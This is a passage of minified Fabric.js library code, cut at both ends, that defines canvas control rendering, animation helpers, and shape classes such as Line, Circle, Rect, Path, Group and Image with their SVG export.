g.setTransform(_,0,0,_,0,0),g.strokeStyle=g.fillStyle=b.cornerColor||this.cornerColor,this.transparentCorners||(g.strokeStyle=b.cornerStrokeColor||this.cornerStrokeColor),this._setLineDash(g,b.cornerDashArray||this.cornerDashArray),this.setCoords(),this.group&&(y=this.group.calcTransformMatrix()),this.forEachControl(function(p,D,w){M=w.oCoords[D],p.getVisibility(w,D)&&(y&&(M=j.util.transformPoint(M,y)),p.render(g,M.x,M.y,b,w))}),g.restore(),this},isControlVisible:function(g){return this.controls[g]&&this.controls[g].getVisibility(this,g)},setControlVisible:function(g,b){return this._controlsVisibility||(this._controlsVisibility={}),this._controlsVisibility[g]=b,this},setControlsVisibility:function(g){for(var b in g||(g={}),g)this.setControlVisible(b,g[b]);return this},onDeselect:function(){},onSelect:function(){}})}(),j.util.object.extend(j.StaticCanvas.prototype,{FX_DURATION:500,fxCenterObjectH:function(E,g){var b=function(){},_=(g=g||{}).onComplete||b,y=g.onChange||b,M=this;return j.util.animate({target:this,startValue:E.left,endValue:this.getCenterPoint().x,duration:this.FX_DURATION,onChange:function(p){E.set("left",p),M.requestRenderAll(),y()},onComplete:function(){E.setCoords(),_()}})},fxCenterObjectV:function(E,g){var b=function(){},_=(g=g||{}).onComplete||b,y=g.onChange||b,M=this;return j.util.animate({target:this,startValue:E.top,endValue:this.getCenterPoint().y,duration:this.FX_DURATION,onChange:function(p){E.set("top",p),M.requestRenderAll(),y()},onComplete:function(){E.setCoords(),_()}})},fxRemove:function(E,g){var b=function(){},_=(g=g||{}).onComplete||b,y=g.onChange||b,M=this;return j.util.animate({target:this,startValue:E.opacity,endValue:0,duration:this.FX_DURATION,onChange:function(p){E.set("opacity",p),M.requestRenderAll(),y()},onComplete:function(){M.remove(E),_()}})}}),j.util.object.extend(j.Object.prototype,{animate:function(){if(arguments[0]&&"object"==typeof arguments[0]){var g,E=[],_=[];for(g in arguments[0])E.push(g);for(var y=0,M=E.length;y<M;y++)_.push(this._animate(g=E[y],arguments[0][g],arguments[1],y!==M-1));return _}return this._animate.apply(this,arguments)},_animate:function(E,g,b,_){var M,y=this;g=g.toString(),b=b?j.util.object.clone(b):{},~E.indexOf(".")&&(M=E.split("."));var p=y.colorProperties.indexOf(E)>-1||M&&y.colorProperties.indexOf(M[1])>-1,D=M?this.get(M[0])[M[1]]:this.get(E);"from"in b||(b.from=D),p||(g=~g.indexOf("=")?D+parseFloat(g.replace("=","")):parseFloat(g));var w={target:this,startValue:b.from,endValue:g,byValue:b.by,easing:b.easing,duration:b.duration,abort:b.abort&&function(x,S,O){return b.abort.call(y,x,S,O)},onChange:function(x,S,O){M?y[M[0]][M[1]]=x:y.set(E,x),!_&&b.onChange&&b.onChange(x,S,O)},onComplete:function(x,S,O){_||(y.setCoords(),b.onComplete&&b.onComplete(x,S,O))}};return p?j.util.animateColor(w.startValue,w.endValue,w.duration,w):j.util.animate(w)}}),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.extend,_=g.util.object.clone,y={x1:1,x2:1,y1:1,y2:1};function M(p,D){var w=p.origin,x=p.axis1,S=p.axis2,O=p.dimension,U=D.nearest,K=D.center,ee=D.farthest;return function(){switch(this.get(w)){case U:return Math.min(this.get(x),this.get(S));case K:return Math.min(this.get(x),this.get(S))+.5*this.get(O);case ee:return Math.max(this.get(x),this.get(S))}}}g.Line?g.warn("fabric.Line is already defined"):(g.Line=g.util.createClass(g.Object,{type:"line",x1:0,y1:0,x2:0,y2:0,cacheProperties:g.Object.prototype.cacheProperties.concat("x1","x2","y1","y2"),initialize:function(p,D){p||(p=[0,0,0,0]),this.callSuper("initialize",D),this.set("x1",p[0]),this.set("y1",p[1]),this.set("x2",p[2]),this.set("y2",p[3]),this._setWidthHeight(D)},_setWidthHeight:function(p){p||(p={}),this.width=Math.abs(this.x2-this.x1),this.height=Math.abs(this.y2-this.y1),this.left="left"in p?p.left:this._getLeftToOriginX(),this.top="top"in p?p.top:this._getTopToOriginY()},_set:function(p,D){return this.callSuper("_set",p,D),void 0!==y[p]&&this._setWidthHeight(),this},_getLeftToOriginX:M({origin:"originX",axis1:"x1",axis2:"x2",dimension:"width"},{nearest:"left",center:"center",farthest:"right"}),_getTopToOriginY:M({origin:"originY",axis1:"y1",axis2:"y2",dimension:"height"},{nearest:"top",center:"center",farthest:"bottom"}),_render:function(p){p.beginPath();var D=this.calcLinePoints();p.moveTo(D.x1,D.y1),p.lineTo(D.x2,D.y2),p.lineWidth=this.strokeWidth;var w=p.strokeStyle;p.strokeStyle=this.stroke||p.fillStyle,this.stroke&&this._renderStroke(p),p.strokeStyle=w},_findCenterFromElement:function(){return{x:(this.x1+this.x2)/2,y:(this.y1+this.y2)/2}},toObject:function(p){return b(this.callSuper("toObject",p),this.calcLinePoints())},_getNonTransformedDimensions:function(){var p=this.callSuper("_getNonTransformedDimensions");return"butt"===this.strokeLineCap&&(0===this.width&&(p.y-=this.strokeWidth),0===this.height&&(p.x-=this.strokeWidth)),p},calcLinePoints:function(){var p=this.x1<=this.x2?-1:1,D=this.y1<=this.y2?-1:1;return{x1:p*this.width*.5,x2:p*this.width*-.5,y1:D*this.height*.5,y2:D*this.height*-.5}},_toSVG:function(){var p=this.calcLinePoints();return["<line ","COMMON_PARTS",'x1="',p.x1,'" y1="',p.y1,'" x2="',p.x2,'" y2="',p.y2,'" />\n']}}),g.Line.ATTRIBUTE_NAMES=g.SHARED_ATTRIBUTES.concat("x1 y1 x2 y2".split(" ")),g.Line.fromElement=function(p,D,w){w=w||{};var x=g.parseAttributes(p,g.Line.ATTRIBUTE_NAMES);D(new g.Line([x.x1||0,x.y1||0,x.x2||0,x.y2||0],b(x,w)))},g.Line.fromObject=function(p,D){var x=_(p,!0);x.points=[p.x1,p.y1,p.x2,p.y2],g.Object._fromObject("Line",x,function w(S){delete S.points,D&&D(S)},"points")})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.degreesToRadians;g.Circle?g.warn("fabric.Circle is already defined."):(g.Circle=g.util.createClass(g.Object,{type:"circle",radius:0,startAngle:0,endAngle:360,cacheProperties:g.Object.prototype.cacheProperties.concat("radius","startAngle","endAngle"),_set:function(y,M){return this.callSuper("_set",y,M),"radius"===y&&this.setRadius(M),this},toObject:function(y){return this.callSuper("toObject",["radius","startAngle","endAngle"].concat(y))},_toSVG:function(){var y,D=(this.endAngle-this.startAngle)%360;if(0===D)y=["<circle ","COMMON_PARTS",'cx="0" cy="0" ','r="',this.radius,'" />\n'];else{var w=b(this.startAngle),x=b(this.endAngle),S=this.radius;y=['<path d="M '+g.util.cos(w)*S+" "+g.util.sin(w)*S," A "+S+" "+S," 0 ",+(D>180?"1":"0")+" 1"," "+g.util.cos(x)*S+" "+g.util.sin(x)*S,'" ',"COMMON_PARTS"," />\n"]}return y},_render:function(y){y.beginPath(),y.arc(0,0,this.radius,b(this.startAngle),b(this.endAngle),!1),this._renderPaintInOrder(y)},getRadiusX:function(){return this.get("radius")*this.get("scaleX")},getRadiusY:function(){return this.get("radius")*this.get("scaleY")},setRadius:function(y){return this.radius=y,this.set("width",2*y).set("height",2*y)}}),g.Circle.ATTRIBUTE_NAMES=g.SHARED_ATTRIBUTES.concat("cx cy r".split(" ")),g.Circle.fromElement=function(y,M){var p=g.parseAttributes(y,g.Circle.ATTRIBUTE_NAMES);if(!function _(y){return"radius"in y&&y.radius>=0}(p))throw new Error("value of `r` attribute is required and can not be negative");p.left=(p.left||0)-p.radius,p.top=(p.top||0)-p.radius,M(new g.Circle(p))},g.Circle.fromObject=function(y,M){g.Object._fromObject("Circle",y,M)})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={});g.Triangle?g.warn("fabric.Triangle is already defined"):(g.Triangle=g.util.createClass(g.Object,{type:"triangle",width:100,height:100,_render:function(b){var _=this.width/2,y=this.height/2;b.beginPath(),b.moveTo(-_,y),b.lineTo(0,-y),b.lineTo(_,y),b.closePath(),this._renderPaintInOrder(b)},_toSVG:function(){var b=this.width/2,_=this.height/2;return["<polygon ","COMMON_PARTS",'points="',[-b+" "+_,"0 "+-_,b+" "+_].join(","),'" />']}}),g.Triangle.fromObject=function(b,_){return g.Object._fromObject("Triangle",b,_)})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=2*Math.PI;g.Ellipse?g.warn("fabric.Ellipse is already defined."):(g.Ellipse=g.util.createClass(g.Object,{type:"ellipse",rx:0,ry:0,cacheProperties:g.Object.prototype.cacheProperties.concat("rx","ry"),initialize:function(_){this.callSuper("initialize",_),this.set("rx",_&&_.rx||0),this.set("ry",_&&_.ry||0)},_set:function(_,y){switch(this.callSuper("_set",_,y),_){case"rx":this.rx=y,this.set("width",2*y);break;case"ry":this.ry=y,this.set("height",2*y)}return this},getRx:function(){return this.get("rx")*this.get("scaleX")},getRy:function(){return this.get("ry")*this.get("scaleY")},toObject:function(_){return this.callSuper("toObject",["rx","ry"].concat(_))},_toSVG:function(){return["<ellipse ","COMMON_PARTS",'cx="0" cy="0" ','rx="',this.rx,'" ry="',this.ry,'" />\n']},_render:function(_){_.beginPath(),_.save(),_.transform(1,0,0,this.ry/this.rx,0,0),_.arc(0,0,this.rx,0,b,!1),_.restore(),this._renderPaintInOrder(_)}}),g.Ellipse.ATTRIBUTE_NAMES=g.SHARED_ATTRIBUTES.concat("cx cy rx ry".split(" ")),g.Ellipse.fromElement=function(_,y){var M=g.parseAttributes(_,g.Ellipse.ATTRIBUTE_NAMES);M.left=(M.left||0)-M.rx,M.top=(M.top||0)-M.ry,y(new g.Ellipse(M))},g.Ellipse.fromObject=function(_,y){g.Object._fromObject("Ellipse",_,y)})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.extend;g.Rect?g.warn("fabric.Rect is already defined"):(g.Rect=g.util.createClass(g.Object,{stateProperties:g.Object.prototype.stateProperties.concat("rx","ry"),type:"rect",rx:0,ry:0,cacheProperties:g.Object.prototype.cacheProperties.concat("rx","ry"),initialize:function(_){this.callSuper("initialize",_),this._initRxRy()},_initRxRy:function(){this.rx&&!this.ry?this.ry=this.rx:this.ry&&!this.rx&&(this.rx=this.ry)},_render:function(_){var y=this.rx?Math.min(this.rx,this.width/2):0,M=this.ry?Math.min(this.ry,this.height/2):0,p=this.width,D=this.height,w=-this.width/2,x=-this.height/2,S=0!==y||0!==M,O=.4477152502;_.beginPath(),_.moveTo(w+y,x),_.lineTo(w+p-y,x),S&&_.bezierCurveTo(w+p-O*y,x,w+p,x+O*M,w+p,x+M),_.lineTo(w+p,x+D-M),S&&_.bezierCurveTo(w+p,x+D-O*M,w+p-O*y,x+D,w+p-y,x+D),_.lineTo(w+y,x+D),S&&_.bezierCurveTo(w+O*y,x+D,w,x+D-O*M,w,x+D-M),_.lineTo(w,x+M),S&&_.bezierCurveTo(w,x+O*M,w+O*y,x,w+y,x),_.closePath(),this._renderPaintInOrder(_)},toObject:function(_){return this.callSuper("toObject",["rx","ry"].concat(_))},_toSVG:function(){return["<rect ","COMMON_PARTS",'x="',-this.width/2,'" y="',-this.height/2,'" rx="',this.rx,'" ry="',this.ry,'" width="',this.width,'" height="',this.height,'" />\n']}}),g.Rect.ATTRIBUTE_NAMES=g.SHARED_ATTRIBUTES.concat("x y rx ry width height".split(" ")),g.Rect.fromElement=function(_,y,M){if(!_)return y(null);M=M||{};var p=g.parseAttributes(_,g.Rect.ATTRIBUTE_NAMES);p.left=p.left||0,p.top=p.top||0,p.height=p.height||0,p.width=p.width||0;var D=new g.Rect(b(M?g.util.object.clone(M):{},p));D.visible=D.visible&&D.width>0&&D.height>0,y(D)},g.Rect.fromObject=function(_,y){return g.Object._fromObject("Rect",_,y)})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.extend,_=g.util.array.min,y=g.util.array.max,M=g.util.toFixed,p=g.util.projectStrokeOnPoints;g.Polyline?g.warn("fabric.Polyline is already defined"):(g.Polyline=g.util.createClass(g.Object,{type:"polyline",points:null,exactBoundingBox:!1,cacheProperties:g.Object.prototype.cacheProperties.concat("points"),initialize:function(D,w){w=w||{},this.points=D||[],this.callSuper("initialize",w),this._setPositionDimensions(w)},_projectStrokeOnPoints:function(){return p(this.points,this,!0)},_setPositionDimensions:function(D){var x,w=this._calcDimensions(D),S=this.exactBoundingBox?this.strokeWidth:0;this.width=w.width-S,this.height=w.height-S,D.fromSVG||(x=this.translateToGivenOrigin({x:w.left-this.strokeWidth/2+S/2,y:w.top-this.strokeWidth/2+S/2},"left","top",this.originX,this.originY)),void 0===D.left&&(this.left=D.fromSVG?w.left:x.x),void 0===D.top&&(this.top=D.fromSVG?w.top:x.y),this.pathOffset={x:w.left+this.width/2+S/2,y:w.top+this.height/2+S/2}},_calcDimensions:function(){var D=this.exactBoundingBox?this._projectStrokeOnPoints():this.points,w=_(D,"x")||0,x=_(D,"y")||0;return{left:w,top:x,width:(y(D,"x")||0)-w,height:(y(D,"y")||0)-x}},toObject:function(D){return b(this.callSuper("toObject",D),{points:this.points.concat()})},_toSVG:function(){for(var D=[],w=this.pathOffset.x,x=this.pathOffset.y,S=g.Object.NUM_FRACTION_DIGITS,O=0,U=this.points.length;O<U;O++)D.push(M(this.points[O].x-w,S),",",M(this.points[O].y-x,S)," ");return["<"+this.type+" ","COMMON_PARTS",'points="',D.join(""),'" />\n']},commonRender:function(D){var w,x=this.points.length,S=this.pathOffset.x,O=this.pathOffset.y;if(!x||isNaN(this.points[x-1].y))return!1;D.beginPath(),D.moveTo(this.points[0].x-S,this.points[0].y-O);for(var U=0;U<x;U++)D.lineTo((w=this.points[U]).x-S,w.y-O);return!0},_render:function(D){!this.commonRender(D)||this._renderPaintInOrder(D)},complexity:function(){return this.get("points").length}}),g.Polyline.ATTRIBUTE_NAMES=g.SHARED_ATTRIBUTES.concat(),g.Polyline.fromElementGenerator=function(D){return function(w,x,S){if(!w)return x(null);S||(S={});var O=g.parsePointsAttribute(w.getAttribute("points")),U=g.parseAttributes(w,g[D].ATTRIBUTE_NAMES);U.fromSVG=!0,x(new g[D](O,b(U,S)))}},g.Polyline.fromElement=g.Polyline.fromElementGenerator("Polyline"),g.Polyline.fromObject=function(D,w){return g.Object._fromObject("Polyline",D,w,"points")})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.projectStrokeOnPoints;g.Polygon?g.warn("fabric.Polygon is already defined"):(g.Polygon=g.util.createClass(g.Polyline,{type:"polygon",_projectStrokeOnPoints:function(){return b(this.points,this)},_render:function(_){!this.commonRender(_)||(_.closePath(),this._renderPaintInOrder(_))}}),g.Polygon.ATTRIBUTE_NAMES=g.SHARED_ATTRIBUTES.concat(),g.Polygon.fromElement=g.Polyline.fromElementGenerator("Polygon"),g.Polygon.fromObject=function(_,y){g.Object._fromObject("Polygon",_,y,"points")})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.array.min,_=g.util.array.max,y=g.util.object.extend,M=g.util.object.clone,p=g.util.toFixed;g.Path?g.warn("fabric.Path is already defined"):(g.Path=g.util.createClass(g.Object,{type:"path",path:null,cacheProperties:g.Object.prototype.cacheProperties.concat("path","fillRule"),stateProperties:g.Object.prototype.stateProperties.concat("path"),initialize:function(D,w){delete(w=M(w||{})).path,this.callSuper("initialize",w),this._setPath(D||[],w)},_setPath:function(D,w){this.path=g.util.makePathSimpler(Array.isArray(D)?D:g.util.parsePath(D)),g.Polyline.prototype._setPositionDimensions.call(this,w||{})},_renderPathCommands:function(D){var w,x=0,S=0,O=0,U=0,se=-this.pathOffset.x,ve=-this.pathOffset.y;D.beginPath();for(var le=0,ye=this.path.length;le<ye;++le)switch(w=this.path[le],w[0]){case"L":D.lineTo((O=w[1])+se,(U=w[2])+ve);break;case"M":x=O=w[1],S=U=w[2],D.moveTo(O+se,U+ve);break;case"C":D.bezierCurveTo(w[1]+se,w[2]+ve,w[3]+se,w[4]+ve,(O=w[5])+se,(U=w[6])+ve);break;case"Q":D.quadraticCurveTo(w[1]+se,w[2]+ve,w[3]+se,w[4]+ve),O=w[3],U=w[4];break;case"z":case"Z":O=x,U=S,D.closePath()}},_render:function(D){this._renderPathCommands(D),this._renderPaintInOrder(D)},toString:function(){return"#<fabric.Path ("+this.complexity()+'): { "top": '+this.top+', "left": '+this.left+" }>"},toObject:function(D){return y(this.callSuper("toObject",D),{path:this.path.map(function(w){return w.slice()})})},toDatalessObject:function(D){var w=this.toObject(["sourcePath"].concat(D));return w.sourcePath&&delete w.path,w},_toSVG:function(){return["<path ","COMMON_PARTS",'d="',g.util.joinPath(this.path),'" stroke-linecap="round" ',"/>\n"]},_getOffsetTransform:function(){var D=g.Object.NUM_FRACTION_DIGITS;return" translate("+p(-this.pathOffset.x,D)+", "+p(-this.pathOffset.y,D)+")"},toClipPathSVG:function(D){var w=this._getOffsetTransform();return"\t"+this._createBaseClipPathSVGMarkup(this._toSVG(),{reviver:D,additionalTransform:w})},toSVG:function(D){var w=this._getOffsetTransform();return this._createBaseSVGMarkup(this._toSVG(),{reviver:D,additionalTransform:w})},complexity:function(){return this.path.length},_calcDimensions:function(){for(var x,ee,D=[],w=[],S=0,O=0,U=0,K=0,se=0,ve=this.path.length;se<ve;++se){switch((x=this.path[se])[0]){case"L":U=x[1],K=x[2],ee=[];break;case"M":S=U=x[1],O=K=x[2],ee=[];break;case"C":ee=g.util.getBoundsOfCurve(U,K,x[1],x[2],x[3],x[4],x[5],x[6]),U=x[5],K=x[6];break;case"Q":ee=g.util.getBoundsOfCurve(U,K,x[1],x[2],x[1],x[2],x[3],x[4]),U=x[3],K=x[4];break;case"z":case"Z":U=S,K=O}ee.forEach(function(v){D.push(v.x),w.push(v.y)}),D.push(U),w.push(K)}var le=b(D)||0,ye=b(w)||0;return{left:le,top:ye,width:(_(D)||0)-le,height:(_(w)||0)-ye}}}),g.Path.fromObject=function(D,w){"string"==typeof D.sourcePath?g.loadSVGFromURL(D.sourcePath,function(S){var O=S[0];O.setOptions(D),D.clipPath?g.util.enlivenObjects([D.clipPath],function(U){O.clipPath=U[0],w&&w(O)}):w&&w(O)}):g.Object._fromObject("Path",D,w,"path")},g.Path.ATTRIBUTE_NAMES=g.SHARED_ATTRIBUTES.concat(["d"]),g.Path.fromElement=function(D,w,x){var S=g.parseAttributes(D,g.Path.ATTRIBUTE_NAMES);S.fromSVG=!0,w(new g.Path(S.d,y(S,x)))})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.array.min,_=g.util.array.max;g.Group||(g.Group=g.util.createClass(g.Object,g.Collection,{type:"group",strokeWidth:0,subTargetCheck:!1,cacheProperties:[],useSetOnGroup:!1,initialize:function(y,M,p){M=M||{},this._objects=[],p&&this.callSuper("initialize",M),this._objects=y||[];for(var D=this._objects.length;D--;)this._objects[D].group=this;if(p)this._updateObjectsACoords();else{var w=M&&M.centerPoint;void 0!==M.originX&&(this.originX=M.originX),void 0!==M.originY&&(this.originY=M.originY),w||this._calcBounds(),this._updateObjectsCoords(w),delete M.centerPoint,this.callSuper("initialize",M)}this.setCoords()},_updateObjectsACoords:function(){for(var M=this._objects.length;M--;)this._objects[M].setCoords(!0)},_updateObjectsCoords:function(M){M=M||this.getCenterPoint();for(var p=this._objects.length;p--;)this._updateObjectCoords(this._objects[p],M)},_updateObjectCoords:function(y,M){y.set({left:y.left-M.x,top:y.top-M.y}),y.group=this,y.setCoords(!0)},toString:function(){return"#<fabric.Group: ("+this.complexity()+")>"},addWithUpdate:function(y){var M=!!this.group;return this._restoreObjectsState(),g.util.resetObjectTransform(this),y&&(M&&g.util.removeTransformFromObject(y,this.group.calcTransformMatrix()),this._objects.push(y),y.group=this,y._set("canvas",this.canvas)),this._calcBounds(),this._updateObjectsCoords(),this.dirty=!0,M?this.group.addWithUpdate():this.setCoords(),this},removeWithUpdate:function(y){return this._restoreObjectsState(),g.util.resetObjectTransform(this),this.remove(y),this._calcBounds(),this._updateObjectsCoords(),this.setCoords(),this.dirty=!0,this},_onObjectAdded:function(y){this.dirty=!0,y.group=this,y._set("canvas",this.canvas)},_onObjectRemoved:function(y){this.dirty=!0,delete y.group},_set:function(y,M){var p=this._objects.length;if(this.useSetOnGroup)for(;p--;)this._objects[p].setOnGroup(y,M);if("canvas"===y)for(;p--;)this._objects[p]._set(y,M);g.Object.prototype._set.call(this,y,M)},toObject:function(y){var M=this.includeDefaultValues,p=this._objects.filter(function(w){return!w.excludeFromExport}).map(function(w){var x=w.includeDefaultValues;w.includeDefaultValues=M;var S=w.toObject(y);return w.includeDefaultValues=x,S}),D=g.Object.prototype.toObject.call(this,y);return D.objects=p,D},toDatalessObject:function(y){var M,p=this.sourcePath;if(p)M=p;else{var D=this.includeDefaultValues;M=this._objects.map(function(x){var S=x.includeDefaultValues;x.includeDefaultValues=D;var O=x.toDatalessObject(y);return x.includeDefaultValues=S,O})}var w=g.Object.prototype.toDatalessObject.call(this,y);return w.objects=M,w},render:function(y){this._transformDone=!0,this.callSuper("render",y),this._transformDone=!1},shouldCache:function(){var y=g.Object.prototype.shouldCache.call(this);if(y)for(var M=0,p=this._objects.length;M<p;M++)if(this._objects[M].willDrawShadow())return this.ownCaching=!1,!1;return y},willDrawShadow:function(){if(g.Object.prototype.willDrawShadow.call(this))return!0;for(var y=0,M=this._objects.length;y<M;y++)if(this._objects[y].willDrawShadow())return!0;return!1},isOnACache:function(){return this.ownCaching||this.group&&this.group.isOnACache()},drawObject:function(y){for(var M=0,p=this._objects.length;M<p;M++)this._objects[M].render(y);this._drawClipPath(y,this.clipPath)},isCacheDirty:function(y){if(this.callSuper("isCacheDirty",y))return!0;if(!this.statefullCache)return!1;for(var M=0,p=this._objects.length;M<p;M++)if(this._objects[M].isCacheDirty(!0)){if(this._cacheCanvas){var D=this.cacheWidth/this.zoomX,w=this.cacheHeight/this.zoomY;this._cacheContext.clearRect(-D/2,-w/2,D,w)}return!0}return!1},_restoreObjectsState:function(){var y=this.calcOwnMatrix();return this._objects.forEach(function(M){g.util.addTransformToObject(M,y),delete M.group,M.setCoords()}),this},destroy:function(){return this._objects.forEach(function(y){y.set("dirty",!0)}),this._restoreObjectsState()},dispose:function(){this.callSuper("dispose"),this.forEachObject(function(y){y.dispose&&y.dispose()}),this._objects=[]},toActiveSelection:function(){if(this.canvas){var y=this._objects,M=this.canvas;this._objects=[];var p=this.toObject();delete p.objects;var D=new g.ActiveSelection([]);return D.set(p),D.type="activeSelection",M.remove(this),y.forEach(function(w){w.group=D,w.dirty=!0,M.add(w)}),D.canvas=M,D._objects=y,M._activeObject=D,D.setCoords(),D}},ungroupOnCanvas:function(){return this._restoreObjectsState()},setObjectsCoords:function(){return this.forEachObject(function(M){M.setCoords(!0)}),this},_calcBounds:function(y){for(var D,w,x,K,M=[],p=[],S=["tr","br","bl","tl"],O=0,U=this._objects.length,ee=S.length;O<U;++O){for(x=(D=this._objects[O]).calcACoords(),K=0;K<ee;K++)M.push(x[w=S[K]].x),p.push(x[w].y);D.aCoords=x}this._getBounds(M,p,y)},_getBounds:function(y,M,p){var D=new g.Point(b(y),b(M)),w=new g.Point(_(y),_(M)),x=D.y||0,S=D.x||0,U=w.y-D.y||0;this.width=w.x-D.x||0,this.height=U,p||this.setPositionByOrigin({x:S,y:x},"left","top")},_toSVG:function(y){for(var M=["<g ","COMMON_PARTS"," >\n"],p=0,D=this._objects.length;p<D;p++)M.push("\t\t",this._objects[p].toSVG(y));return M.push("</g>\n"),M},getSvgStyles:function(){var M=this.visible?"":" visibility: hidden;";return[void 0!==this.opacity&&1!==this.opacity?"opacity: "+this.opacity+";":"",this.getSvgFilter(),M].join("")},toClipPathSVG:function(y){for(var M=[],p=0,D=this._objects.length;p<D;p++)M.push("\t",this._objects[p].toClipPathSVG(y));return this._createBaseClipPathSVGMarkup(M,{reviver:y})}}),g.Group.fromObject=function(y,M){var p=y.objects,D=g.util.object.clone(y,!0);delete D.objects,"string"!=typeof p?g.util.enlivenObjects(p,function(w){g.util.enlivenObjectEnlivables(y,D,function(){M&&M(new g.Group(w,D,!0))})}):g.loadSVGFromURL(p,function(w){var x=g.util.groupSVGElements(w,y,p),S=D.clipPath;delete D.clipPath,x.set(D),S?g.util.enlivenObjects([S],function(O){x.clipPath=O[0],M&&M(x)}):M&&M(x)})})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={});g.ActiveSelection||(g.ActiveSelection=g.util.createClass(g.Group,{type:"activeSelection",initialize:function(b,_){_=_||{},this._objects=b||[];for(var y=this._objects.length;y--;)this._objects[y].group=this;_.originX&&(this.originX=_.originX),_.originY&&(this.originY=_.originY),this._calcBounds(),this._updateObjectsCoords(),g.Object.prototype.initialize.call(this,_),this.setCoords()},toGroup:function(){var b=this._objects.concat();this._objects=[];var _=g.Object.prototype.toObject.call(this),y=new g.Group([]);if(delete _.type,y.set(_),b.forEach(function(p){p.canvas.remove(p),p.group=y}),y._objects=b,!this.canvas)return y;var M=this.canvas;return M.add(y),M._activeObject=y,y.setCoords(),y},onDeselect:function(){return this.destroy(),!1},toString:function(){return"#<fabric.ActiveSelection: ("+this.complexity()+")>"},shouldCache:function(){return!1},isOnACache:function(){return!1},_renderControls:function(b,_,y){b.save(),b.globalAlpha=this.isMoving?this.borderOpacityWhenMoving:1,this.callSuper("_renderControls",b,_),void 0===(y=y||{}).hasControls&&(y.hasControls=!1),y.forActiveSelection=!0;for(var M=0,p=this._objects.length;M<p;M++)this._objects[M]._renderControls(b,y);b.restore()}}),g.ActiveSelection.fromObject=function(b,_){g.util.enlivenObjects(b.objects,function(y){delete b.objects,_&&_(new g.ActiveSelection(y,b,!0))})})}(we),function(E){"use strict";var g=j.util.object.extend;E.fabric||(E.fabric={}),E.fabric.Image?j.warn("fabric.Image is already defined."):(j.Image=j.util.createClass(j.Object,{type:"image",strokeWidth:0,srcFromAttribute:!1,_lastScaleX:1,_lastScaleY:1,_filterScalingX:1,_filterScalingY:1,minimumScaleTrigger:.5,stateProperties:j.Object.prototype.stateProperties.concat("cropX","cropY"),cacheProperties:j.Object.prototype.cacheProperties.concat("cropX","cropY"),cacheKey:"",cropX:0,cropY:0,imageSmoothing:!0,initialize:function(b,_){_||(_={}),this.filters=[],this.cacheKey="texture"+j.Object.__uid++,this.callSuper("initialize",_),this._initElement(b,_)},getElement:function(){return this._element||{}},setElement:function(b,_){return this.removeTexture(this.cacheKey),this.removeTexture(this.cacheKey+"_filtered"),this._element=b,this._originalElement=b,this._initConfig(_),0!==this.filters.length&&this.applyFilters(),this.resizeFilter&&this.applyResizeFilters(),this},removeTexture:function(b){var _=j.filterBackend;_&&_.evictCachesForKey&&_.evictCachesForKey(b)},dispose:function(){this.callSuper("dispose"),this.removeTexture(this.cacheKey),this.removeTexture(this.cacheKey+"_filtered"),this._cacheContext=void 0,["_originalElement","_element","_filteredEl","_cacheCanvas"].forEach(function(b){j.util.cleanUpJsdomNode(this[b]),this[b]=void 0}.bind(this))},getCrossOrigin:function(){return this._originalElement&&(this._originalElement.crossOrigin||null)},getOriginalSize:function(){var b=this.getElement();return{width:b.naturalWidth||b.width,height:b.naturalHeight||b.height}},_stroke:function(b){if(this.stroke&&0!==this.strokeWidth){var _=this.width/2,y=this.height/2;b.beginPath(),b.moveTo(-_,-y),b.lineTo(_,-y),b.lineTo(_,y),b.lineTo(-_,y),b.lineTo(-_,-y),b.closePath()}},toObject:function(b){var _=[];this.filters.forEach(function(M){M&&_.push(M.toObject())});var y=g(this.callSuper("toObject",["cropX","cropY"].concat(b)),{src:this.getSrc(),crossOrigin:this.getCrossOrigin(),filters:_});return this.resizeFilter&&(y.resizeFilter=this.resizeFilter.toObject()),y},hasCrop:function(){return this.cropX||this.cropY||this.width<this._element.width||this.height<this._element.height},_toSVG:function(){var y,b=[],_=[],M=this._element,p=-this.width/2,D=-this.height/2,w="",x="";if(!M)return[];if(this.hasCrop()){var S=j.Object.__uid++;b.push('<clipPath id="imageCrop_'+S+'">\n','\t<rect x="'+p+'" y="'+D+'" width="'+this.width+'" height="'+this.height+'" />\n',"</clipPath>\n"),w=' clip-path="url(#imageCrop_'+S+')" '}if(this.imageSmoothing||(x='" image-rendering="optimizeSpeed'),_.push("\t<image ","COMMON_PARTS",'xlink:href="',this.getSvgSrc(!0),'" x="',p-this.cropX,'" y="',D-this.cropY,'" width="',M.width||M.naturalWidth,'" height="',M.height||M.height,x,'"',w,"></image>\n"),this.stroke||this.strokeDashArray){var O=this.fill;this.fill=null,y=["\t<rect ",'x="',p,'" y="',D,'" width="',this.width,'" height="',this.height,'" style="',this.getSvgStyles(),'"/>\n'],this.fill=O}return"fill"!==this.paintFirst?b.concat(y,_):b.concat(_,y)},getSrc:function(b){var _=b?this._element:this._originalElement;return _?_.toDataURL?_.toDataURL():this.srcFromAttribute?_.getAttribute("src"):_.src:this.src||""},setSrc:function(b,_,y){return j.util.loadImage(b,function(M,p){this.setElement(M,y),this._setWidthHeight(),_&&_(this,p)},this,y&&y.crossOrigin),this},toString:function(){return'#<fabric.Image: { src: "'+this.getSrc()+'" }>'},applyResizeFilters:function(){var b=this.resizeFilter,_=this.minimumScaleTrigger,y=this.getTotalObjectScaling(),M=y.scaleX,p=y.scaleY,D=this._filteredEl||this._originalElement;if(this.group&&this.set("dirty",!0),!b||M>_&&p>_)return this._element=D,this._filterScalingX=1,this._filterScalingY=1,this._lastScaleX=M,void(this._lastScaleY=p);j.filterBackend||(j.filterBackend=j.initFilterBackend());var 